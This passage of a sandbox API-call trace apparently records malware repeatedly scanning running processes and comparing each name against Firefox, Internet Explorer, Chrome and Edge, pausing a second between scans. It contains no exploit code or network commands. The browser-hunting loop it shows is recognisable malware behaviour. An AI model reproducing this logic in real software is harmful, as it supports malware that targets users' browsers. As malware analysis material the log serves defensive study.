lpString2="microsoftedgecp.exe") returned -1 [0177.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0177.110] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0177.110] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0177.110] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0177.110] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0177.111] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0177.111] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0177.111] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0177.111] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.111] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0177.111] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0177.111] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0177.111] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0177.111] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.111] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0177.112] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0177.112] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0177.112] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0177.112] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.112] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0177.112] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0177.112] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0177.112] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0177.112] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.112] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.113] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0177.113] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0177.113] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0177.113] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.113] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.113] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.113] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.114] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.114] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.114] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0177.114] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0177.114] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0177.114] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0177.114] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.114] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.115] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.115] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.115] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.115] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.115] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0177.115] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0177.115] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0177.115] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0177.115] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.115] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.116] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.116] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.116] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.116] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.116] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.116] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0177.116] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0177.116] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0177.116] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.116] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0177.117] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0177.117] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0177.117] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0177.117] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.117] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.117] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0177.118] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0177.118] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0177.118] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.118] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.118] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0177.118] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0177.118] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0177.118] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.118] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.119] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0177.119] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0177.119] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0177.119] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.119] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.119] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0177.119] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0177.119] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0177.119] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.119] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.120] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0177.120] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0177.120] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0177.120] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.120] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0177.120] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0177.120] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0177.120] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0177.121] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.121] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0177.121] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0177.121] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0177.121] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0177.121] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0177.121] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0177.122] CloseHandle (hObject=0xd4) returned 1 [0177.122] Sleep (dwMilliseconds=0x3e8) [0178.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0178.147] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.148] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0178.148] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0178.148] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0178.148] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0178.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0178.149] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0178.149] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0178.149] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0178.149] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0178.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0178.149] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0178.149] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0178.149] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0178.149] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0178.150] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0178.150] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0178.150] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0178.150] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0178.150] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0178.150] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0178.150] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0178.150] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0178.151] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0178.151] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0178.151] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0178.151] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0178.151] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0178.151] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0178.151] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0178.151] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0178.152] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0178.152] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0178.152] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0178.152] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0178.153] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0178.153] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0178.153] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0178.153] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0178.153] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0178.153] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0178.153] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0178.153] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.154] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.154] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.154] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.154] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.154] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.154] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.154] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.154] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.155] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.155] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.155] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.155] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.155] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.155] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.155] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.155] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.156] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.156] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.156] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.156] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.156] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0178.157] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0178.157] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0178.157] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0178.157] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.157] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.157] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.157] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.157] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.158] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.158] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.158] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.158] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.158] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0178.158] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0178.158] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0178.158] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0178.158] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.158] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0178.159] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0178.159] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0178.159] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0178.159] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.159] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: 